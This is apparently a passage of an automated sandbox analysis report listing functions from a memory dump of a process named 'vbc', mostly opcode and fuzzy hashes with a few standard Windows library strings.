                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bc541d8b4e37d77086c63edf13b0cbe65718c8b239db381fe283de04200a9064
                                                                                                                                                  • Instruction ID: 848c2418541bd606e10d10482efbadacede29a8c8e896c8e493e180c12b8efed
                                                                                                                                                  • Opcode Fuzzy Hash: bc541d8b4e37d77086c63edf13b0cbe65718c8b239db381fe283de04200a9064
                                                                                                                                                  • Instruction Fuzzy Hash: 7D9002A260150042454471584848406601597E27013D5C515A0558660C8A188955926E
                                                                                                                                                  Function 05C84340 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bae585c897ce8b8b69c03910bf12eb896cc9d45b4ea354486185af502bac98f2
                                                                                                                                                  • Instruction ID: ecf0b3bf0ff97590f9adf94e8b0f276cb00c7878fb0e3534ec29ec97a49ed6c7
                                                                                                                                                  • Opcode Fuzzy Hash: bae585c897ce8b8b69c03910bf12eb896cc9d45b4ea354486185af502bac98f2
                                                                                                                                                  • Instruction Fuzzy Hash: 7F900272605800129544715848C8546401597E1701B95C411E0428654C8E148A565366
                                                                                                                                                  Function 05C82DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 376e10483fec35867f1e7f051be53fbda8600615a5ab32f3177272f07e2cba07
                                                                                                                                                  • Instruction ID: fe8b739654745065a73825d4ee48e25cb74cd856335dffff23a480a35e5f30f9
                                                                                                                                                  • Opcode Fuzzy Hash: 376e10483fec35867f1e7f051be53fbda8600615a5ab32f3177272f07e2cba07
                                                                                                                                                  • Instruction Fuzzy Hash: 6690027224140402D54571584448606001997D1641FD5C412A0428654E8A558B56AA66
                                                                                                                                                  Function 05C82D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3a0ddeda90d3503e95eebc72726a174ff6a658a9871dd8bf8d944f00bc197aa5
                                                                                                                                                  • Instruction ID: cdb4317cff3b7ca3f8498dd6a09e76b3f04b5676cce2ef83c28dd24e1f62d8ec
                                                                                                                                                  • Opcode Fuzzy Hash: 3a0ddeda90d3503e95eebc72726a174ff6a658a9871dd8bf8d944f00bc197aa5
                                                                                                                                                  • Instruction Fuzzy Hash: 6E90026220544442D5047558544CA06001587D1605F95D411A1068695DCA358951A136
                                                                                                                                                  Function 05C82CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 92226b2d8cabfd48fb661fd2ea1a2e0faf632a7afb6f6f855c7b6a5bf71aef21
                                                                                                                                                  • Instruction ID: 47986a541385b88968616367f5871d5a5c124e1f86c82412b62ac9eb6364e629
                                                                                                                                                  • Opcode Fuzzy Hash: 92226b2d8cabfd48fb661fd2ea1a2e0faf632a7afb6f6f855c7b6a5bf71aef21
                                                                                                                                                  • Instruction Fuzzy Hash: 5B90026260540402D5447158545C706002587D1601F95D411A0028654DCA598B5566A6
                                                                                                                                                  Function 05C82CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f01a466969a2fec85921cc0205d965b98bddf87bf67be25446046da7541bdec6
                                                                                                                                                  • Instruction ID: b50d44a2819ee15c5f460147fe6bdd2900d809e483ebb9ce76b68b00cfe38a95
                                                                                                                                                  • Opcode Fuzzy Hash: f01a466969a2fec85921cc0205d965b98bddf87bf67be25446046da7541bdec6
                                                                                                                                                  • Instruction Fuzzy Hash: BF90027220140403D5047158554C707001587D1601F95D811A0428658DDA5689516126
                                                                                                                                                  Function 05C82C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b48be9c1d8506e128d4bf85439b4b008b0341646830a78811ec2702b906dac51
                                                                                                                                                  • Instruction ID: 6f9fbaaec50b4c3e1c27a65af7d297193d1836b9e7d3fa8f4234fc810316aa5d
                                                                                                                                                  • Opcode Fuzzy Hash: b48be9c1d8506e128d4bf85439b4b008b0341646830a78811ec2702b906dac51
                                                                                                                                                  • Instruction Fuzzy Hash: 6690027220140842D50471584448B46001587E1701F95C416A0128754D8A15C9517526
                                                                                                                                                  Function 05C82FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e8ece4f7345ec2530a490fa5b76bb88a1e80a1735cd82864b01ef55f1e5a31c6
                                                                                                                                                  • Instruction ID: 86c7a2b477a8d67a0ebd4b60d617f1efa93408647dd3cc939dd19684c6249621
                                                                                                                                                  • Opcode Fuzzy Hash: e8ece4f7345ec2530a490fa5b76bb88a1e80a1735cd82864b01ef55f1e5a31c6
                                                                                                                                                  • Instruction Fuzzy Hash: 3C90027220180402D5047158484C747001587D1702F95C411A5168655E8A65C9916536
                                                                                                                                                  Function 05C82F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3c8c90ce1dd2449cd5ee1bd7921b498a0038817e78bda3ad3d24bb2e1466aedc
                                                                                                                                                  • Instruction ID: 503f9d9f5443d3b4b840da49cbef4d448701a805fbd9a61d8056143e57fed73c
                                                                                                                                                  • Opcode Fuzzy Hash: 3c8c90ce1dd2449cd5ee1bd7921b498a0038817e78bda3ad3d24bb2e1466aedc
                                                                                                                                                  • Instruction Fuzzy Hash: 6C9002A221140042D50871584448706005587E2601F95C412A2158654CC9298D61512A
                                                                                                                                                  Function 05C82EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fe4accbd34e546451178a54e401a10b8f7fa4d827d4fd314d317e82abcd49e0c
                                                                                                                                                  • Instruction ID: d9e967bd7295bf4ca0dacafb1567eb38ae0b2a5e2bee227b7a219a4a3ca397ce
                                                                                                                                                  • Opcode Fuzzy Hash: fe4accbd34e546451178a54e401a10b8f7fa4d827d4fd314d317e82abcd49e0c
                                                                                                                                                  • Instruction Fuzzy Hash: C89002A220180403D54475584848607001587D1702F95C411A2068655E8E298D51613A
                                                                                                                                                  Function 05C82E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1aac8fea7ba8e88f24eca2df3dfcbfab8905338e0845da92c8e032a78ab24c7c
                                                                                                                                                  • Instruction ID: 111cadf5273d437937242bf89c03493af8c910d84e7700102bfedde0e1763773
                                                                                                                                                  • Opcode Fuzzy Hash: 1aac8fea7ba8e88f24eca2df3dfcbfab8905338e0845da92c8e032a78ab24c7c
                                                                                                                                                  • Instruction Fuzzy Hash: BD90026230140402D506715844586060019C7D2745FD5C412E1428655D8A258A53A137
                                                                                                                                                  Function 05C82BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 44f50b92ee9f8b1668d0b56ce5740df1369cf9a91acc9197b021a0932362eb3b
                                                                                                                                                  • Instruction ID: 49abd9a78c7a7d1e12b9d37f11023459ad4cfb2778b646b144cf5b0141ce0fc9
                                                                                                                                                  • Opcode Fuzzy Hash: 44f50b92ee9f8b1668d0b56ce5740df1369cf9a91acc9197b021a0932362eb3b
                                                                                                                                                  • Instruction Fuzzy Hash: 3690027220544842D54471584448A46002587D1705F95C411A0068794D9A258E55B666
                                                                                                                                                  Function 05C82B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2962e99829a7df529b7b213d13dcc1d23c366d85d07acb17cfdf9ec1c8c0d9cb
                                                                                                                                                  • Instruction ID: 4277ebd4ae638d74b6eddef152e30bc69ef4bbac9158b381b823e319fb9829a6
                                                                                                                                                  • Opcode Fuzzy Hash: 2962e99829a7df529b7b213d13dcc1d23c366d85d07acb17cfdf9ec1c8c0d9cb
                                                                                                                                                  • Instruction Fuzzy Hash: DC90027220140802D50871584848686001587D1701F95C411A6028755E9A6589917136
                                                                                                                                                  Function 05C82BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e710a03d2b4e3c406d70e9291b394b6c6116aa3a7b57e2eba55fce3704cbde8e
                                                                                                                                                  • Instruction ID: b6d88e849cd6a7b84047e14c45cbd60696bdea5f552ff85cd8f24b08a52e376e
                                                                                                                                                  • Opcode Fuzzy Hash: e710a03d2b4e3c406d70e9291b394b6c6116aa3a7b57e2eba55fce3704cbde8e
                                                                                                                                                  • Instruction Fuzzy Hash: FB90027260540802D55471584458746001587D1701F95C411A0028754D8B558B5576A6
                                                                                                                                                  Function 05C82AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 24dc7be18608beeb6d8a78150e057076f2873cf007b51daed57453593c8178f6
                                                                                                                                                  • Instruction ID: a0f6e8cd6565a50e83678663a979b2d951ae179e1e90e2b30760d9d9036bad20
                                                                                                                                                  • Opcode Fuzzy Hash: 24dc7be18608beeb6d8a78150e057076f2873cf007b51daed57453593c8178f6
                                                                                                                                                  • Instruction Fuzzy Hash: B8900266221400020549B558064850B045597D77513D5C415F141A690CCA2189655326
                                                                                                                                                  Function 05C82AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 99bed7271393c68c596d554794ede9383c48d7b6eab90390a5951542ea4c772a
                                                                                                                                                  • Instruction ID: 963de2485a18fb045bdb1bd3782bd2436a48ed802e3747563926c958dd8b32b0
                                                                                                                                                  • Opcode Fuzzy Hash: 99bed7271393c68c596d554794ede9383c48d7b6eab90390a5951542ea4c772a
                                                                                                                                                  • Instruction Fuzzy Hash: 579002E2201540924904B2588448B0A451587E1601B95C416E1058660CC9258951913A
                                                                                                                                                  Function 05C835C0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3ef636c2d1b7411492e053532b8315b01ba6458bcd1f8d21ef6eec293fdc3a4f
                                                                                                                                                  • Instruction ID: 74a3315c372234f260adaf5772ce14ba3648f7faa6e70a68ccecb1b00ddefca2
                                                                                                                                                  • Opcode Fuzzy Hash: 3ef636c2d1b7411492e053532b8315b01ba6458bcd1f8d21ef6eec293fdc3a4f
                                                                                                                                                  • Instruction Fuzzy Hash: DF90027260550402D50471584558706101587D1601FA5C811A0428668D8B958A5165A7
                                                                                                                                                  Function 05C83090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7b5f22132a412cd16c8d15fdb6b354d5b4f13ac4f880a0fbca70d288f1219aac
                                                                                                                                                  • Instruction ID: db8b6a4fc8366c3cec857e0398ef113fe9c3f345870112a2f97215f441c0f04f
                                                                                                                                                  • Opcode Fuzzy Hash: 7b5f22132a412cd16c8d15fdb6b354d5b4f13ac4f880a0fbca70d288f1219aac
                                                                                                                                                  • Instruction Fuzzy Hash: BB90026224140802D544715884587070016C7D1A01F95C411A0028654D8A168A6566B6
                                                                                                                                                  Function 05C83010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e84a31787e3a56730c663ff693b52e6612699922f9883b541af17c4e95d18899
                                                                                                                                                  • Instruction ID: d5aec94fa89548ca9ffd60ccfc00798c56233a60c555af70318f35c8b5cc9b22
                                                                                                                                                  • Opcode Fuzzy Hash: e84a31787e3a56730c663ff693b52e6612699922f9883b541af17c4e95d18899
                                                                                                                                                  • Instruction Fuzzy Hash: 4F90026220184442D54472584848B0F411587E2602FD5C419A415A654CCD1589555726
                                                                                                                                                  Function 05C83D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ea244ca24e6ac26961535541deb748f7956e744799521c3d1971110a9f770429
                                                                                                                                                  • Instruction ID: 5d8c29554c601006d0cd423c2c0461c6f2a84a656501b4e11c4634b4a483690a
                                                                                                                                                  • Opcode Fuzzy Hash: ea244ca24e6ac26961535541deb748f7956e744799521c3d1971110a9f770429
                                                                                                                                                  • Instruction Fuzzy Hash: AD90027620140402D91471585848646005687D1701F95D811A0428658D8A5489A1A126
                                                                                                                                                  Function 05C83D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 273f0aaf2a01b228467061aac03ffe366c86f4afd9295edc67fb224ef1dabeb6
                                                                                                                                                  • Instruction ID: bbd7da4b07abaa52a324fa784541531122e3de3eafffd79a6ef391ecd8a783dc
                                                                                                                                                  • Opcode Fuzzy Hash: 273f0aaf2a01b228467061aac03ffe366c86f4afd9295edc67fb224ef1dabeb6
                                                                                                                                                  • Instruction Fuzzy Hash: 1390027220240142994472585848A4E411587E2702BD5D815A0019654CCD1489615226
                                                                                                                                                  Function 05C839B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 32ee35df482c75628bce404941a99c2a6d9dbec7a1a66aeb269ed72d95f7c7c4
                                                                                                                                                  • Instruction ID: a0980a5df182ab06effb2c8fb5c3caf3d4fae39fe0d7f338e27e2478acb4d479
                                                                                                                                                  • Opcode Fuzzy Hash: 32ee35df482c75628bce404941a99c2a6d9dbec7a1a66aeb269ed72d95f7c7c4
                                                                                                                                                  • Instruction Fuzzy Hash: 5390026224545102D554715C44486164015A7E1601F95C421A0818694D895589556226
                                                                                                                                                  Function 05C82C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                  • Instruction ID: 507b3742804afa6cd4dc1c171d36b355d8d207a6485a6319ece5ff7a6d98dbf8
                                                                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                  Function 05C82890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: 9d7d43c8faf414cc2a4be96a754f8ef1d238d943076e64f00cac4b82ba7e04a3
                                                                                                                                                  • Instruction ID: 9f86d597e56567e5622aaacc35d588145855aa7a6b1486b6461ce05424181b49
                                                                                                                                                  • Opcode Fuzzy Hash: 9d7d43c8faf414cc2a4be96a754f8ef1d238d943076e64f00cac4b82ba7e04a3
                                                                                                                                                  • Instruction Fuzzy Hash: F65117B6B04116BFDF20EF99888897EF7B9BB09204B508929E4A5D3641D374DF10DBE0
                                                                                                                                                  Function 05CF2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: 555eab58235b36d6b966054f5ad8b5c50c277885d5a7a985be96e73d5685f1ca
                                                                                                                                                  • Instruction ID: b7b5b643a69b57d58384d7b18ed0b91f5ab7c59f5fa813da6a19372eacbfac97
                                                                                                                                                  • Opcode Fuzzy Hash: 555eab58235b36d6b966054f5ad8b5c50c277885d5a7a985be96e73d5685f1ca
                                                                                                                                                  • Instruction Fuzzy Hash: C5511579A04645AFCB74DF9CCC9097FBBFAEB44200B008C6AE696D7641E6B4DB00D760
                                                                                                                                                  Function 05C77630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05CB4655
                                                                                                                                                  • Execute=1, xrefs: 05CB4713
                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 05CB4787
                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05CB4742
                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 05CB46FC
                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05CB4725
                                                                                                                                                  • ExecuteOptions, xrefs: 05CB46A0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                  • Opcode ID: 254f0baf94a606d5ba4989d9866ad94c0126142f4768fc4efd648f7f9c4d4951
                                                                                                                                                  • Instruction ID: f5d2ff900e5e562a0aa6e53cedcd407bd90722e91e8729b2c9bdfb09ee1e00b1
                                                                                                                                                  • Opcode Fuzzy Hash: 254f0baf94a606d5ba4989d9866ad94c0126142f4768fc4efd648f7f9c4d4951
                                                                                                                                                  • Instruction Fuzzy Hash: 2D51F43160421DBAEF11EBA9DC89FFA77F9FB04304F040CE9E506A7581EB71AA41DA54
                                                                                                                                                  Function 05C8B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
